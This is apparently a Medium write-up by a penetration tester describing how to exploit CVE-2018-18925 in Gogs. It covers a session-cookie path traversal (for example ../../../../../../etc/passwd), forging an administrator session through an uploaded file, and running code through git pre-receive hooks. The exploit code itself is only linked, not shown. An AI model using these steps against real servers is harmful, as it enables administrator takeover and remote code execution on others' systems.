CVE-2018–18925

Exploitation of CVE-2018–18925 a Remote Code Execution against the Git self hosted tool: Gogs.

Gogs is based on the Macaron framework. The system used to manage session is very similar to what PHP does. The session identifier in the cookie is mapped to a file on the file system. When the web server receives a request with a session identifier (as a cookie), it looks up for the file on the file system.

The vulnerability is a simple directory traversal when retrieving the file used for the session on the file system. You can for example, set the i_like_gogits cookie to ../../../../../../etc/passwd to get an error from the server.

Exploitation:

In order to exploit the session bypass, we will need a way to upload a specially crafted file, then we will use this file as our session id, we can create our own crafted session id file with https://github.com/RyouYoo/CVE-2018-18925/blob/main/main.go.

Usage:

go run main.go

Uploading the malicious file and logged in as administrator

When creating the copy of the repository locally, Gogs put the files in /data/gogs/data/tmp/local-repo/[REPO_ID]/[FILENAME] (this repository is only created when you use the “Upload file” functionality).

Where [FILENAME] is the name of the file you upload and [REPO_ID] is the repository identifier that can be found using the Fork link:

Where 5 is the repo id.

By default, the sessions are stored in /data/gogs/data/sessions/. Therefore, you can use the following relative path for your session id: ../tmp/local-repo/[REPO_ID]/[FILENAME]. By using this path in your i_like_gogits cookie, you should be logged in as administrator.

Remote Code Execution:

In order to get RCE, you can use the git hooks functionality in a given repository to run a shell script.

In pre-receive inject your code:

Then make a push request, with git or with create file function to get the hook executed.

--

--

--

Web Penetration Tester

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Road to Game Dev: Creating a Player Controller (Part 1)

How we created Review Page Custom widgets with Flutter

Here are the best RPA Tools of 2021

Create a WordPress App using Flutter part-3

You can ‘hack’ any webpage with this new browser extension!

Collaborating on content with enterprise customers

Running PHPUnit Tests with Code Coverage in PHPStorm When Working in Docker

Python Programming Tricks

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Aymen EL Haski (Jakom)

Aymen EL Haski (Jakom)

Web Penetration Tester

More from Medium

Methods for putting an end to perimeter security

Tool for making zip files with malicious content

CoreDump: Provable Security

picoCTF: fixme2.py